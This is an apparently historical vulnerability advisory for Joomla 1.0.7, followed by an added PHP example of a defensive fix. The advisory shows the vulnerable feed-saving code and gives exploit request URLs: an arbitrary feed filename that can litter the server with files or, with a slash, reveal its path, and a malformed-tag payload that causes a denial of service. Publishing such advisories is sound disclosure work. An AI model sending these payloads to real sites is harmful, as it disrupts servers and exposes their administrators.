`
RST/GHC -- JOOMLA CMS -- ADVISORY #37
Product: Joomla
Affected version: 1.0.7
Last version: 1.0.7
Vendor: Joomla!
URL: http://www.joomla.org/
online demo: http://demo.joomla.org/
VULNERABILITY CLASS: DoS, path disclosure
[Product Description]
Joomla! is a Content Management System (CMS) created by the same award-winning
team that brought the Mambo CMS to its current state of stardom.
[Summary]
An attacker can cause several undesirable conditions for the server administrator.
[Details]
1. Real server path disclosure and arbitrary filename creation.
Vulnerable script: includes/feedcreator.class.php
[code]
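function saveFeed($filename="", $displayContents=true) {
    if ($filename=="") {
        $filename = $this->_generateFilename();
    }
    // $filename is opened for writing exactly as it was passed in
    $feedFile = fopen($filename, "w+");
    if ($feedFile) {
        fputs($feedFile,$this->createFeed());
        fclose($feedFile);
        if ($displayContents) {
            $this->_redirect($filename);
        }
    }
    // the advisory's excerpt ends here; the rest of the function is not shown
}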
[/code]
Exploit:
Vulnerable script: index.php?option=com_rss&feed=filename_here&no_html=1
An attacker can write simple code to litter the server with lots of cached files.
To disclose the real path, just put a slash symbol in the filename.
2. Denial of service.
Vulnerable script: includes/phpInputFilter/class.inputfilter.php
The anti-XSS code cannot cope with several tags. This can cause denial of service.
Exploit:
index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
[DISCLOSURE TIMELINE]
09/02/06 - vendor notification
26/02/06 - new release (1.0.8) with bugfix
bugs discovered by Foster
RST/GHC
http://rst.void.ru
http://www.ghc.ru
`
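One way to close item 1 of the advisory, as an added example that is not Joomla's code and not the 1.0.8 fix: map the `feed` parameter through an allowlist to fixed cache file names, so the request never supplies the name that reaches fopen(). The helper names, the allowlist entries and the cache directory are assumptions.

```php
<?php
// Added example (PHP 7.1+). Hypothetical helpers, not Joomla code.

// Assumed allowlist: each accepted feed type maps to one fixed cache file name,
// so a request can never choose the name of the file that gets written.
const FEED_FILES = [
    'RSS0.91' => 'rss091.xml',
    'RSS1.0'  => 'rss10.xml',
    'RSS2.0'  => 'rss20.xml',
    'ATOM0.3' => 'atom03.xml',
];

// Returns the absolute cache path for an allowlisted feed type, or null.
function resolveFeedFile(string $feed, string $cacheDir): ?string
{
    if (!array_key_exists($feed, FEED_FILES)) {
        return null;                       // unknown type, slashes, "..", etc.
    }
    $base = realpath($cacheDir);
    if ($base === false || !is_dir($base) || !is_writable($base)) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . FEED_FILES[$feed];
}

// Writes the feed via a temp file and rename; failure is reported as false,
// with PHP warnings (which would carry the server path) suppressed.
function saveFeedSafely(string $feed, string $xml, string $cacheDir): bool
{
    $path = resolveFeedFile($feed, $cacheDir);
    if ($path === null) {
        return false;
    }
    $tmp = @tempnam(dirname($path), 'feed');
    if ($tmp === false) {
        return false;
    }
    if (@file_put_contents($tmp, $xml) === false || !@rename($tmp, $path)) {
        @unlink($tmp);
        return false;
    }
    return true;
}

// Constructed inputs: one allowlisted type and two request-chosen names.
foreach (['RSS2.0', 'filename_here', 'a/b'] as $feed) {
    var_dump(saveFeedSafely($feed, '<rss version="2.0"/>', sys_get_temp_dir()));
}
```

Because the set of writable file names is fixed, repeated requests can only overwrite the same few cache files, and keeping `display_errors` off in production prevents any remaining warning from exposing the path.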